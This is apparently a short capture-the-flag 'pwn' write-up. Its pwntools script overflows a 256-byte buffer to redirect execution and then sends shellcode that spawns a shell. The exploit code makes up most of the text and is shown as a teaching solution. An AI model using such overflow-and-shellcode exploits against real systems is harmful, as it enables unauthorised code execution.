Tags: pwn 

Rating: 2.3

not very complex, solve it by gdb

``` python
target = 0x60023c

offset = 256
payload = 'A'*offset
payload += p64(target+0x100)

# debug()
p.sendafter("Data: ", payload)

sc=asm(shellcraft.sh())
p.sendafter("Data: ", p64(target+0x8)+sc)
```

Original writeup (http://taqini.space/).